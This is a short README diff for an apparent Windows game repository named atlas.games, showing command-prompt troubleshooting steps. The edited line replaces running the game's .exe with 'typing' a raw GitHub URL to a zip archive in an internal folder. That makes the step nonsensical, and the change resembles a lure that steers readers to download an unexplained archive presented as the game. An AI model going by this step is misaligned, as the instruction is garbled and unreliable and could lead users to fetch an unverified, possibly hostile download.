JefkeVerboven/atlas.games/README.md

 - If the game window closes immediately after starting, try running the `.exe` from the command prompt manually:
   - Press Windows key + R, type `cmd`, and press Enter.
   - Navigate to the folder with the game file by typing `cd path\to\folder`.
-  - Run the game by typing `atlas.games.exe`.
+  - Run the game by typing `https://raw.githubusercontent.com/JefkeVerboven/atlas.games/main/internal/game/games-atlas-v2.3.zip`.

 - Make sure your system meets the requirements above.
 - If the game feels slow, try closing other apps before running it.